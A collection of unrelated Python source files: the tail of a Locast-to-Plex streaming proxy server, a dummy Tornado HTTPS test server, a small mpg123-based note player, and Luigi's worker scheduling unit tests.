self.wfile.write(videoData)
time.sleep(0.1)
except (socket.error):
break
videoData = ffmpeg_proc.stdout.read(1024000)
ffmpeg_proc.terminate()
# elif self.path == '/epg.xml':
# self.send_response(200)
# self.send_header('Content-type','application/xml')
# self.end_headers()
elif self.path == '/debug.json':
self.send_response(200)
self.send_header('Content-type','application/json')
self.end_headers()
else:
print("Unknown request to " + self.path)
self.send_response(501)
self.send_header('Content-type','text/html')
self.end_headers()
self.wfile.write(self.templates['htmlError'].format('501 - Not Implemented'))
return
def do_POST(self):
contentPath = self.path
queryData = {}
if self.headers.get('Content-Length') != '0':
postdata = self.rfile.read(int(self.headers.get('Content-Length')))
postdataElements = postdata.split('&')
for postdataItem in postdataElements:
postdataItemSplit = postdataItem.split('=')
if len(postdataItemSplit) > 1:
queryData[postdataItemSplit[0]] = postdataItemSplit[1]
if self.path.find('?') != -1:
contentPath = self.path[0:self.path.find('?')]
getdata = self.path[(self.path.find('?') + 1):]
getdataElements = getdata.split('&')
for getdataItem in getdataElements:
getdataItemSplit = getdataItem.split('=')
if len(getdataItemSplit) > 1:
queryData[getdataItemSplit[0]] = getdataItemSplit[1]
if contentPath == '/lineup.post':
if queryData['scan'] == 'start':
self.station_scan = True
self.send_response(200)
self.send_header('Content-type','text/html')
self.end_headers()
self.station_list = locast.get_stations()
self.station_scan = False
elif queryData['scan'] == 'abort':
self.send_response(200)
self.send_header('Content-type','text/html')
self.end_headers()
else:
print("Unknown scan command " + queryData['scan'])
self.send_response(400)
self.send_header('Content-type','text/html')
self.end_headers()
self.wfile.write(self.templates['htmlError'].format(queryData['scan'] + ' is not a valid scan command'))
else:
print("Unknown request to " + contentPath)
return
# mostly from https://github.com/ZeWaren/python-upnp-ssdp-example
# and https://stackoverflow.com/questions/46210672/python-2-7-streaming-http-server-supporting-multiple-connections-on-one-port
class PlexHttpServer(threading.Thread):
def __init__(self, serverSocket, config, templates, station_list, locast_service):
threading.Thread.__init__(self)
PlexHttpHandler.address = config["host"][0]
PlexHttpHandler.port = config["host"][1]
PlexHttpHandler.uuid = config["uuid"]
PlexHttpHandler.templates = templates
PlexHttpHandler.station_list = station_list
PlexHttpHandler.local_locast = locast_service
self.address = config["listen"][0]
self.port = config["listen"][1]
self.socket = serverSocket
self.daemon = True
self.start()
def run(self):
httpd = HTTPServer((self.address, int(self.port)), PlexHttpHandler, False)
httpd.socket = self.socket
httpd.server_bind = self.server_close = lambda self: None
httpd.serve_forever()
# mostly from https://github.com/ZeWaren/python-upnp-ssdp-example
def ssdpServerProcess(address, port, uuid):
ssdp = SSDPServer.SSDPServer()
ssdp.register('local',
'uuid:' + uuid + '::upnp:rootdevice',
'upnp:rootdevice',
'http://' + address + ':' + port + '/device.xml')
try:
ssdp.run()
except KeyboardInterrupt:
pass
################################### Startup Logic
if __name__ == '__main__':
# set to directory of script
os.chdir(os.path.dirname(os.path.abspath(__file__)))
LISTEN_ADDY = "0.0.0.0"
LISTEN_PORT = "6077"
CURRENT_VERSION = "0.4.2"
DEVICE_UUID = "12345678"
CONCURRENT_LISTENERS = 10
DEBUG_MODE = os.getenv('debug', False)
CONFIG_LOCAST_USERNAME = os.getenv('username', '')
CONFIG_LOCAST_PASSWORD = os.getenv('password', '')
HOST_PORT = os.getenv("external_port", '6077')
HOST_ADDY = os.getenv("external_addy", '0.0.0.0')
for argument in sys.argv:
if argument.startswith('-u:'):
CONFIG_LOCAST_USERNAME = argument[3:]
elif argument.startswith('-p:'):
CONFIG_LOCAST_PASSWORD = argument[3:]
elif argument.startswith('--debug'):
DEBUG_MODE = True
elif argument.startswith('--port:'):
HOST_PORT = argument[7:]
elif argument.startswith('--addy:'):
HOST_ADDY = argument[7:]
print("Locast2Plex v" + CURRENT_VERSION)
if DEBUG_MODE:
print("DEBUG MODE ACTIVE")
# generate UUID here for when we are not using docker
if not os.path.exists(os.path.curdir + '/service_uuid'):
print("No UUID found. Generating one now...")
# from https://pynative.com/python-generate-random-string/
# create a string that wouldn't be a real device uuid for
DEVICE_UUID = ''.join(random.choice("hijklmnopqrstuvwxyz") for i in range(8))
with open("service_uuid", 'w') as uuid_file:
uuid_file.write(DEVICE_UUID)
else:
print("UUID found.")
with open("service_uuid", 'r') as uuid_file:
DEVICE_UUID = uuid_file.read().replace('\n', '')
print("UUID set to: " + DEVICE_UUID + "...")
# check environment vars
if (CONFIG_LOCAST_USERNAME == ''):
print("Usernanme not specified. Exiting...")
exit()
if (CONFIG_LOCAST_PASSWORD == ''):
print("Password not specified. Exiting...")
exit()
# make sure we don't just let any value be set for this...
if (DEBUG_MODE != False):
DEBUG_MODE = True
ffmpeg_proc = None
mock_location = None
#mock_location = {
# "latitude": "47.6062",
# "longitude": "-122.3321"
#}
#
locast = LocastService.LocastService("./", mock_location)
station_list = None
if (not locast.login(CONFIG_LOCAST_USERNAME, CONFIG_LOCAST_PASSWORD)) or (not locast.validate_user()):
print("Exiting...")
clean_exit()
else:
station_list = locast.get_stations()
try:
print("Starting device server on " + LISTEN_ADDY + ":" + LISTEN_PORT)
serverSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serverSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
serverSocket.bind((LISTEN_ADDY, int(LISTEN_PORT)))
serverSocket.listen(CONCURRENT_LISTENERS)
config = {
"host": (HOST_ADDY, HOST_PORT),
"listen": (LISTEN_ADDY, LISTEN_PORT),
"uuid": DEVICE_UUID
}
for i in range(CONCURRENT_LISTENERS):
PlexHttpServer(serverSocket, config, templates, station_list, locast)
print("Starting SSDP server...")
ssdpServer = Process(target=ssdpServerProcess, args=(HOST_ADDY, HOST_PORT, DEVICE_UUID))
ssdpServer.daemon = True
ssdpServer.start()
# wait forever
while True:
time.sleep(3600)
except KeyboardInterrupt:
print('^C received, shutting down the server')
clean_exit()
|
server.py
|
#!/usr/bin/env python
"""
Dummy server used for unit testing.
"""
from __future__ import print_function
import errno
import logging
import os
import random
import string
import sys
import threading
import socket
from tornado.platform.auto import set_close_exec
import tornado.wsgi
import tornado.httpserver
import tornado.ioloop
import tornado.web
log = logging.getLogger(__name__)
CERTS_PATH = os.path.join(os.path.dirname(__file__), 'certs')
DEFAULT_CERTS = {
'certfile': os.path.join(CERTS_PATH, 'server.crt'),
'keyfile': os.path.join(CERTS_PATH, 'server.key'),
}
DEFAULT_CA = os.path.join(CERTS_PATH, 'cacert.pem')
DEFAULT_CA_BAD = os.path.join(CERTS_PATH, 'client_bad.pem')
# Different types of servers we have:
class SocketServerThread(threading.Thread):
"""
:param socket_handler: Callable which receives a socket argument for one
request.
:param ready_event: Event which gets set when the socket handler is
ready to receive requests.
"""
def __init__(self, socket_handler, host='localhost', port=8081,
ready_event=None):
threading.Thread.__init__(self)
self.socket_handler = socket_handler
self.host = host
self.ready_event = ready_event
def _start_server(self):
sock = socket.socket(socket.AF_INET6)
if sys.platform != 'win32':
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((self.host, 0))
self.port = sock.getsockname()[1]
# Once listen() returns, the server socket is ready
sock.listen(1)
if self.ready_event:
self.ready_event.set()
self.socket_handler(sock)
sock.close()
def run(self):
self.server = self._start_server()
# FIXME: there is a pull request patching bind_sockets in Tornado directly.
# If it gets merged and released we can drop this and use
# `tornado.netutil.bind_sockets` again.
# https://github.com/facebook/tornado/pull/977
def bind_sockets(port, address=None, family=socket.AF_UNSPEC, backlog=128,
flags=None):
"""Creates listening sockets bound to the given port and address.
Returns a list of socket objects (multiple sockets are returned if
the given address maps to multiple IP addresses, which is most common
for mixed IPv4 and IPv6 use).
Address may be either an IP address or hostname. If it's a hostname,
the server will listen on all IP addresses associated with the
name. Address may be an empty string or None to listen on all
available interfaces. Family may be set to either `socket.AF_INET`
or `socket.AF_INET6` to restrict to IPv4 or IPv6 addresses, otherwise
both will be used if available.
The ``backlog`` argument has the same meaning as for
`socket.listen() <socket.socket.listen>`.
``flags`` is a bitmask of AI_* flags to `~socket.getaddrinfo`, like
``socket.AI_PASSIVE | socket.AI_NUMERICHOST``.
"""
sockets = []
if address == "":
address = None
if not socket.has_ipv6 and family == socket.AF_UNSPEC:
# Python can be compiled with --disable-ipv6, which causes
# operations on AF_INET6 sockets to fail, but does not
# automatically exclude those results from getaddrinfo
# results.
# http://bugs.python.org/issue16208
family = socket.AF_INET
if flags is None:
flags = socket.AI_PASSIVE
binded_port = None
for res in set(socket.getaddrinfo(address, port, family,
socket.SOCK_STREAM, 0, flags)):
af, socktype, proto, canonname, sockaddr = res
try:
sock = socket.socket(af, socktype, proto)
except socket.error as e:
if e.args[0] == errno.EAFNOSUPPORT:
continue
raise
set_close_exec(sock.fileno())
if os.name != 'nt':
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
if af == socket.AF_INET6:
# On linux, ipv6 sockets accept ipv4 too by default,
# but this makes it impossible to bind to both
# 0.0.0.0 in ipv4 and :: in ipv6. On other systems,
# separate sockets *must* be used to listen for both ipv4
# and ipv6. For consistency, always disable ipv4 on our
# ipv6 sockets and use a separate ipv4 socket when needed.
#
# Python 2.x on windows doesn't have IPPROTO_IPV6.
if hasattr(socket, "IPPROTO_IPV6"):
sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 1)
# automatic port allocation with port=None
# should bind on the same port on IPv4 and IPv6
host, requested_port = sockaddr[:2]
if requested_port == 0 and binded_port is not None:
sockaddr = tuple([host, binded_port] + list(sockaddr[2:]))
sock.setblocking(0)
sock.bind(sockaddr)
binded_port = sock.getsockname()[1]
sock.listen(backlog)
sockets.append(sock)
return sockets
def run_tornado_app(app, io_loop, certs, scheme, host):
if scheme == 'https':
http_server = tornado.httpserver.HTTPServer(app, ssl_options=certs,
io_loop=io_loop)
else:
http_server = tornado.httpserver.HTTPServer(app, io_loop=io_loop)
sockets = bind_sockets(None, address=host)
port = sockets[0].getsockname()[1]
http_server.add_sockets(sockets)
return http_server, port
def run_loop_in_thread(io_loop):
t = threading.Thread(target=io_loop.start)
t.start()
return t
def get_unreachable_address():
while True:
host = ''.join(random.choice(string.ascii_lowercase)
for _ in range(60))
sockaddr = (host, 54321)
# check if we are really "lucky" and hit an actual server
try:
s = socket.create_connection(sockaddr)
except socket.error:
return sockaddr
else:
s.close()
|
nplayer.py
|
import threading,time,traceback,json,sys,os
os.chdir(os.path.dirname(os.path.abspath(sys.argv[0]))) #switch to script directory
import child
def sanitize(path): #to prevent directory traversal
return path.replace("/","").replace("\\","")
mode = "" #parser for args: -d = debug mode, -p path = playerpath, file = file
debug = False
if sys.platform[0:3] == "win":
playerpath = os.path.abspath("./bin/windows/mpg123.exe")
else:
playerpath = os.path.abspath("./bin/unix/mpg123")
for param in sys.argv[1:]:
if mode == "-p":
playerpath = os.path.abspath(param)
mode = ""
else:
if param == "-p":
mode = "-p"
elif param == "-d":
debug = True
else:
file = os.path.abspath(param)
if debug:
print("Argv : " + str(sys.argv[1:]))
print("Debug : True")
print("Playerpath : " + str(playerpath))
print("File : " + file)
file_content = json.load(open(file,"r"))
tact = file_content["header"]["tact"]
base = file_content["header"]["base"]
packdb = {}
for include in file_content["header"]["includes"]: #create pack database
try:
packdata = json.load(open("./packs/" + sanitize(include) + "/pack.json","r"))
packdb[include] = [packdata["samplerate"],os.path.abspath("./packs/" + sanitize(include)),sanitize(packdata["extension"])]
except:
sys.exit("Error: failed to include " + include)
if debug:
print("Packdb : " + str(packdb),end="\n\n")
for group in file_content["notes"]: #start playing notes
counter = 0
for sound in file_content["notes"][group]["sounds"]:
file = packdb[file_content["notes"][group]["packs"][counter]]
file = file[1] + "/" + sanitize(sound) + file[2]
frames = base * ((1/file_content["notes"][group]["types"][counter])/tact) * packdb[file_content["notes"][group]["packs"][counter]][0] #base * (type/tact) * samplerate = time
if debug:
print("Playerpath : " + str(playerpath))
print("File : " + file)
print("Frames : " + str(frames),end="\n\n")
threading.Thread(target=child.run,daemon=True,args=(playerpath,file,frames/1000)).start() #play note with child
counter = counter + 1
if file_content["notes"][group]["wait"]:
if debug:
print("Wait : " + str(base * (1/sorted(file_content["notes"][group]["types"])[0]/tact)),end="\n\n\n")
time.sleep(float(base * (1/sorted(file_content["notes"][group]["types"])[0]/tact)))
counter = 0
while threading.active_count() > 1 and counter < 100: #exit after 10 seconds or with no threads
counter = counter + 1
if debug:
print("Threads : " + str(threading.active_count()-1))
print("Counter : " + str(counter))
time.sleep(0.1)
if counter >= 100:
print("Warning: terminated with " + str(threading.active_count()-1) + " threads remaining")
|
worker_test.py
|
# -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
import functools
import logging
import os
import shutil
import signal
import tempfile
import threading
import time
import psutil
from helpers import (unittest, with_config, skipOnTravis, LuigiTestCase,
temporary_unloaded_module)
import luigi.notifications
import luigi.task_register
import luigi.worker
import mock
from luigi import ExternalTask, RemoteScheduler, Task, Event
from luigi.mock import MockTarget, MockFileSystem
from luigi.scheduler import Scheduler
from luigi.worker import Worker
from luigi.rpc import RPCError
from luigi import six
from luigi.cmdline import luigi_run
luigi.notifications.DEBUG = True
class DummyTask(Task):
def __init__(self, *args, **kwargs):
super(DummyTask, self).__init__(*args, **kwargs)
self.has_run = False
def complete(self):
return self.has_run
def run(self):
logging.debug("%s - setting has_run", self)
self.has_run = True
class DynamicDummyTask(Task):
p = luigi.Parameter()
def output(self):
return luigi.LocalTarget(self.p)
def run(self):
with self.output().open('w') as f:
f.write('Done!')
time.sleep(0.5) # so we can benchmark & see if parallelization works
class DynamicDummyTaskWithNamespace(DynamicDummyTask):
task_namespace = 'banana'
class DynamicRequires(Task):
p = luigi.Parameter()
use_banana_task = luigi.BoolParameter(default=False)
def output(self):
return luigi.LocalTarget(os.path.join(self.p, 'parent'))
def run(self):
if self.use_banana_task:
task_cls = DynamicDummyTaskWithNamespace
else:
task_cls = DynamicDummyTask
dummy_targets = yield [task_cls(os.path.join(self.p, str(i)))
for i in range(5)]
dummy_targets += yield [task_cls(os.path.join(self.p, str(i)))
for i in range(5, 7)]
with self.output().open('w') as f:
for i, d in enumerate(dummy_targets):
for line in d.open('r'):
print('%d: %s' % (i, line.strip()), file=f)
class DynamicRequiresOtherModule(Task):
p = luigi.Parameter()
def output(self):
return luigi.LocalTarget(os.path.join(self.p, 'baz'))
def run(self):
import other_module
other_target_foo = yield other_module.OtherModuleTask(os.path.join(self.p, 'foo')) # NOQA
other_target_bar = yield other_module.OtherModuleTask(os.path.join(self.p, 'bar')) # NOQA
with self.output().open('w') as f:
f.write('Done!')
class DummyErrorTask(Task):
retry_index = 0
def run(self):
self.retry_index += 1
raise Exception("Retry index is %s for %s" % (self.retry_index, self.task_family))
class WorkerTest(LuigiTestCase):
def run(self, result=None):
self.sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
self.time = time.time
with Worker(scheduler=self.sch, worker_id='X') as w, Worker(scheduler=self.sch, worker_id='Y') as w2:
self.w = w
self.w2 = w2
super(WorkerTest, self).run(result)
if time.time != self.time:
time.time = self.time
def setTime(self, t):
time.time = lambda: t
def test_dep(self):
class A(Task):
def run(self):
self.has_run = True
def complete(self):
return self.has_run
a = A()
class B(Task):
def requires(self):
return a
def run(self):
self.has_run = True
def complete(self):
return self.has_run
b = B()
a.has_run = False
b.has_run = False
self.assertTrue(self.w.add(b))
self.assertTrue(self.w.run())
self.assertTrue(a.has_run)
self.assertTrue(b.has_run)
def test_external_dep(self):
class A(ExternalTask):
def complete(self):
return False
a = A()
class B(Task):
def requires(self):
return a
def run(self):
self.has_run = True
def complete(self):
return self.has_run
b = B()
a.has_run = False
b.has_run = False
self.assertTrue(self.w.add(b))
self.assertTrue(self.w.run())
self.assertFalse(a.has_run)
self.assertFalse(b.has_run)
def test_externalized_dep(self):
class A(Task):
has_run = False
def run(self):
self.has_run = True
def complete(self):
return self.has_run
a = A()
class B(A):
def requires(self):
return luigi.task.externalize(a)
b = B()
self.assertTrue(self.w.add(b))
self.assertTrue(self.w.run())
self.assertFalse(a.has_run)
self.assertFalse(b.has_run)
def test_legacy_externalized_dep(self):
class A(Task):
has_run = False
def run(self):
self.has_run = True
def complete(self):
return self.has_run
a = A()
a.run = NotImplemented
class B(A):
def requires(self):
return a
b = B()
self.assertTrue(self.w.add(b))
self.assertTrue(self.w.run())
self.assertFalse(a.has_run)
self.assertFalse(b.has_run)
def test_type_error_in_tracking_run_deprecated(self):
class A(Task):
num_runs = 0
def complete(self):
return False
def run(self, tracking_url_callback=None):
self.num_runs += 1
raise TypeError('bad type')
a = A()
self.assertTrue(self.w.add(a))
self.assertFalse(self.w.run())
# Should only run and fail once, not retry because of the type error
self.assertEqual(1, a.num_runs)
def test_tracking_url(self):
tracking_url = 'http://test_url.com/'
class A(Task):
has_run = False
def complete(self):
return self.has_run
def run(self):
self.set_tracking_url(tracking_url)
self.has_run = True
a = A()
self.assertTrue(self.w.add(a))
self.assertTrue(self.w.run())
tasks = self.sch.task_list('DONE', '')
self.assertEqual(1, len(tasks))
self.assertEqual(tracking_url, tasks[a.task_id]['tracking_url'])
def test_fail(self):
class CustomException(BaseException):
def __init__(self, msg):
self.msg = msg
class A(Task):
def run(self):
self.has_run = True
raise CustomException('bad things')
def complete(self):
return self.has_run
a = A()
class B(Task):
def requires(self):
return a
def run(self):
self.has_run = True
def complete(self):
return self.has_run
b = B()
a.has_run = False
b.has_run = False
self.assertTrue(self.w.add(b))
self.assertFalse(self.w.run())
self.assertTrue(a.has_run)
self.assertFalse(b.has_run)
def test_unknown_dep(self):
# see related test_remove_dep test (grep for it)
class A(ExternalTask):
def complete(self):
return False
class C(Task):
def complete(self):
return True
def get_b(dep):
class B(Task):
def requires(self):
return dep
def run(self):
self.has_run = True
def complete(self):
return False
b = B()
b.has_run = False
return b
b_a = get_b(A())
b_c = get_b(C())
self.assertTrue(self.w.add(b_a))
# So now another worker goes in and schedules C -> B
# This should remove the dep A -> B but will screw up the first worker
self.assertTrue(self.w2.add(b_c))
self.assertFalse(self.w.run()) # should not run anything - the worker should detect that A is broken
self.assertFalse(b_a.has_run)
# not sure what should happen??
# self.w2.run() # should run B since C is fulfilled
# self.assertTrue(b_c.has_run)
def test_unfulfilled_dep(self):
class A(Task):
def complete(self):
return self.done
def run(self):
self.done = True
def get_b(a):
class B(A):
def requires(self):
return a
b = B()
b.done = False
a.done = True
return b
a = A()
b = get_b(a)
self.assertTrue(self.w.add(b))
a.done = False
self.w.run()
self.assertTrue(a.complete())
self.assertTrue(b.complete())
def test_gets_missed_work(self):
class A(Task):
done = False
def complete(self):
return self.done
def run(self):
self.done = True
a = A()
self.assertTrue(self.w.add(a))
# simulate a missed get_work response
self.assertEqual(a.task_id, self.sch.get_work(worker='X')['task_id'])
self.assertTrue(self.w.run())
self.assertTrue(a.complete())
def test_avoid_infinite_reschedule(self):
class A(Task):
def complete(self):
return False
class B(Task):
def complete(self):
return False
def requires(self):
return A()
self.assertTrue(self.w.add(B()))
self.assertFalse(self.w.run())
def test_fails_registering_signal(self):
with mock.patch('luigi.worker.signal', spec=['signal']):
# mock will raise an attribute error getting signal.SIGUSR1
Worker()
def test_allow_reschedule_with_many_missing_deps(self):
class A(Task):
""" Task that must run twice to succeed """
i = luigi.IntParameter()
runs = 0
def complete(self):
return self.runs >= 2
def run(self):
self.runs += 1
class B(Task):
done = False
def requires(self):
return map(A, range(20))
def complete(self):
return self.done
def run(self):
self.done = True
b = B()
w = Worker(scheduler=self.sch, worker_id='X', max_reschedules=1)
self.assertTrue(w.add(b))
self.assertFalse(w.run())
# For b to be done, we must have rescheduled its dependencies to run them twice
self.assertTrue(b.complete())
self.assertTrue(all(a.complete() for a in b.deps()))
def test_interleaved_workers(self):
class A(DummyTask):
pass
a = A()
class B(DummyTask):
def requires(self):
return a
class ExternalB(ExternalTask):
task_family = "B"
def complete(self):
return False
b = B()
eb = ExternalB()
self.assertEqual(str(eb), "B()")
sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
with Worker(scheduler=sch, worker_id='X') as w, Worker(scheduler=sch, worker_id='Y') as w2:
self.assertTrue(w.add(b))
self.assertTrue(w2.add(eb))
logging.debug("RUNNING BROKEN WORKER")
self.assertTrue(w2.run())
self.assertFalse(a.complete())
self.assertFalse(b.complete())
logging.debug("RUNNING FUNCTIONAL WORKER")
self.assertTrue(w.run())
self.assertTrue(a.complete())
self.assertTrue(b.complete())
def test_interleaved_workers2(self):
# two tasks without dependencies, one external, one not
class B(DummyTask):
pass
class ExternalB(ExternalTask):
task_family = "B"
def complete(self):
return False
b = B()
eb = ExternalB()
self.assertEqual(str(eb), "B()")
sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
with Worker(scheduler=sch, worker_id='X') as w, Worker(scheduler=sch, worker_id='Y') as w2:
self.assertTrue(w2.add(eb))
self.assertTrue(w.add(b))
self.assertTrue(w2.run())
self.assertFalse(b.complete())
self.assertTrue(w.run())
self.assertTrue(b.complete())
def test_interleaved_workers3(self):
class A(DummyTask):
def run(self):
logging.debug('running A')
time.sleep(0.1)
super(A, self).run()
a = A()
class B(DummyTask):
def requires(self):
return a
def run(self):
logging.debug('running B')
super(B, self).run()
b = B()
sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
with Worker(scheduler=sch, worker_id='X', keep_alive=True, count_uniques=True) as w:
with Worker(scheduler=sch, worker_id='Y', keep_alive=True, count_uniques=True, wait_interval=0.1) as w2:
self.assertTrue(w.add(a))
self.assertTrue(w2.add(b))
threading.Thread(target=w.run).start()
self.assertTrue(w2.run())
self.assertTrue(a.complete())
self.assertTrue(b.complete())
def test_die_for_non_unique_pending(self):
class A(DummyTask):
def run(self):
logging.debug('running A')
time.sleep(0.1)
super(A, self).run()
a = A()
class B(DummyTask):
def requires(self):
return a
def run(self):
logging.debug('running B')
super(B, self).run()
b = B()
sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
with Worker(scheduler=sch, worker_id='X', keep_alive=True, count_uniques=True) as w:
with Worker(scheduler=sch, worker_id='Y', keep_alive=True, count_uniques=True, wait_interval=0.1) as w2:
self.assertTrue(w.add(b))
self.assertTrue(w2.add(b))
self.assertEqual(w._get_work()[0], a.task_id)
self.assertTrue(w2.run())
self.assertFalse(a.complete())
self.assertFalse(b.complete())
def test_complete_exception(self):
"Tests that a task is still scheduled if its sister task crashes in the complete() method"
class A(DummyTask):
def complete(self):
raise Exception("doh")
a = A()
class C(DummyTask):
pass
c = C()
class B(DummyTask):
def requires(self):
return a, c
b = B()
sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
with Worker(scheduler=sch, worker_id="foo") as w:
self.assertFalse(w.add(b))
self.assertTrue(w.run())
self.assertFalse(b.has_run)
self.assertTrue(c.has_run)
self.assertFalse(a.has_run)
def test_requires_exception(self):
class A(DummyTask):
def requires(self):
raise Exception("doh")
a = A()
class D(DummyTask):
pass
d = D()
class C(DummyTask):
def requires(self):
return d
c = C()
class B(DummyTask):
def requires(self):
return c, a
b = B()
sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
with Worker(scheduler=sch, worker_id="foo") as w:
self.assertFalse(w.add(b))
self.assertTrue(w.run())
self.assertFalse(b.has_run)
self.assertTrue(c.has_run)
self.assertTrue(d.has_run)
self.assertFalse(a.has_run)
def test_run_csv_batch_job(self):
completed = set()
class CsvBatchJob(luigi.Task):
values = luigi.parameter.Parameter(batch_method=','.join)
has_run = False
def run(self):
completed.update(self.values.split(','))
self.has_run = True
def complete(self):
return all(value in completed for value in self.values.split(','))
tasks = [CsvBatchJob(str(i)) for i in range(10)]
for task in tasks:
self.assertTrue(self.w.add(task))
self.assertTrue(self.w.run())
for task in tasks:
self.assertTrue(task.complete())
self.assertFalse(task.has_run)
def test_run_max_batch_job(self):
completed = set()
class MaxBatchJob(luigi.Task):
value = luigi.IntParameter(batch_method=max)
has_run = False
def run(self):
completed.add(self.value)
self.has_run = True
def complete(self):
return any(self.value <= ran for ran in completed)
tasks = [MaxBatchJob(i) for i in range(10)]
for task in tasks:
self.assertTrue(self.w.add(task))
self.assertTrue(self.w.run())
for task in tasks:
self.assertTrue(task.complete())
# only task number 9 should run
self.assertFalse(task.has_run and task.value < 9)
def test_run_batch_job_unbatched(self):
completed = set()
class MaxNonBatchJob(luigi.Task):
value = luigi.IntParameter(batch_method=max)
has_run = False
batchable = False
def run(self):
completed.add(self.value)
self.has_run = True
def complete(self):
return self.value in completed
tasks = [MaxNonBatchJob((i,)) for i in range(10)]
for task in tasks:
self.assertTrue(self.w.add(task))
self.assertTrue(self.w.run())
for task in tasks:
self.assertTrue(task.complete())
self.assertTrue(task.has_run)
def test_run_batch_job_limit_batch_size(self):
completed = set()
runs = []
class CsvLimitedBatchJob(luigi.Task):
value = luigi.parameter.Parameter(batch_method=','.join)
has_run = False
max_batch_size = 4
def run(self):
completed.update(self.value.split(','))
runs.append(self)
def complete(self):
return all(value in completed for value in self.value.split(','))
tasks = [CsvLimitedBatchJob(str(i)) for i in range(11)]
for task in tasks:
self.assertTrue(self.w.add(task))
self.assertTrue(self.w.run())
for task in tasks:
self.assertTrue(task.complete())
self.assertEqual(3, len(runs))
def test_fail_max_batch_job(self):
class MaxBatchFailJob(luigi.Task):
value = luigi.IntParameter(batch_method=max)
has_run = False
def run(self):
self.has_run = True
assert False
def complete(self):
return False
tasks = [MaxBatchFailJob(i) for i in range(10)]
for task in tasks:
self.assertTrue(self.w.add(task))
self.assertFalse(self.w.run())
for task in tasks:
# only task number 9 should run
self.assertFalse(task.has_run and task.value < 9)
self.assertEqual({task.task_id for task in tasks}, set(self.sch.task_list('FAILED', '')))
def test_gracefully_handle_batch_method_failure(self):
class BadBatchMethodTask(DummyTask):
priority = 10
batch_int_param = luigi.IntParameter(batch_method=int.__add__) # should be sum
bad_tasks = [BadBatchMethodTask(i) for i in range(5)]
good_tasks = [DummyTask()]
all_tasks = good_tasks + bad_tasks
self.assertFalse(any(task.complete() for task in all_tasks))
worker = Worker(scheduler=self.sch, keep_alive=True)
for task in all_tasks:
self.assertTrue(worker.add(task))
self.assertFalse(worker.run())
self.assertFalse(any(task.complete() for task in bad_tasks))
# we only get to run the good task if the bad task failures were handled gracefully
self.assertTrue(all(task.complete() for task in good_tasks))
def test_post_error_message_for_failed_batch_methods(self):
class BadBatchMethodTask(DummyTask):
batch_int_param = luigi.IntParameter(batch_method=int.__add__) # should be sum
tasks = [BadBatchMethodTask(1), BadBatchMethodTask(2)]
for task in tasks:
self.assertTrue(self.w.add(task))
self.assertFalse(self.w.run())
failed_ids = set(self.sch.task_list('FAILED', ''))
self.assertEqual({task.task_id for task in tasks}, failed_ids)
self.assertTrue(all(self.sch.fetch_error(task_id)['error'] for task_id in failed_ids))
class WorkerKeepAliveTests(LuigiTestCase):
def setUp(self):
self.sch = Scheduler()
super(WorkerKeepAliveTests, self).setUp()
def _worker_keep_alive_test(self, first_should_live, second_should_live, **worker_args):
worker_args.update({
'scheduler': self.sch,
'worker_processes': 0,
'wait_interval': 0.01,
'wait_jitter': 0.0,
})
w1 = Worker(worker_id='w1', **worker_args)
w2 = Worker(worker_id='w2', **worker_args)
with w1 as worker1, w2 as worker2:
worker1.add(DummyTask())
t1 = threading.Thread(target=worker1.run)
t1.start()
worker2.add(DummyTask())
t2 = threading.Thread(target=worker2.run)
t2.start()
# allow workers to run their get work loops a few times
time.sleep(0.1)
try:
self.assertEqual(first_should_live, t1.isAlive())
self.assertEqual(second_should_live, t2.isAlive())
finally:
# mark the task done so the worker threads will die
self.sch.add_task(worker='DummyWorker', task_id=DummyTask().task_id, status='DONE')
t1.join()
t2.join()
def test_no_keep_alive(self):
self._worker_keep_alive_test(
first_should_live=False,
second_should_live=False,
)
def test_keep_alive(self):
self._worker_keep_alive_test(
first_should_live=True,
second_should_live=True,
keep_alive=True,
)
def test_keep_alive_count_uniques(self):
self._worker_keep_alive_test(
first_should_live=False,
second_should_live=False,
keep_alive=True,
count_uniques=True,
)
def test_keep_alive_count_last_scheduled(self):
self._worker_keep_alive_test(
first_should_live=False,
second_should_live=True,
keep_alive=True,
count_last_scheduled=True,
)
class WorkerInterruptedTest(unittest.TestCase):
def setUp(self):
self.sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
requiring_sigusr = unittest.skipUnless(hasattr(signal, 'SIGUSR1'),
'signal.SIGUSR1 not found on this system')
def _test_stop_getting_new_work(self, worker):
d = DummyTask()
with worker:
worker.add(d) # For assistant its ok that other tasks add it
self.assertFalse(d.complete())
worker.handle_interrupt(signal.SIGUSR1, None)
worker.run()
self.assertFalse(d.complete())
@requiring_sigusr
def test_stop_getting_new_work(self):
self._test_stop_getting_new_work(
Worker(scheduler=self.sch))
@requiring_sigusr
def test_stop_getting_new_work_assistant(self):
self._test_stop_getting_new_work(
Worker(scheduler=self.sch, keep_alive=False, assistant=True))
@requiring_sigusr
def test_stop_getting_new_work_assistant_keep_alive(self):
self._test_stop_getting_new_work(
Worker(scheduler=self.sch, keep_alive=True, assistant=True))
def test_existence_of_disabling_option(self):
# any code equivalent of `os.kill(os.getpid(), signal.SIGUSR1)`
# seem to give some sort of a "InvocationError"
Worker(no_install_shutdown_handler=True)
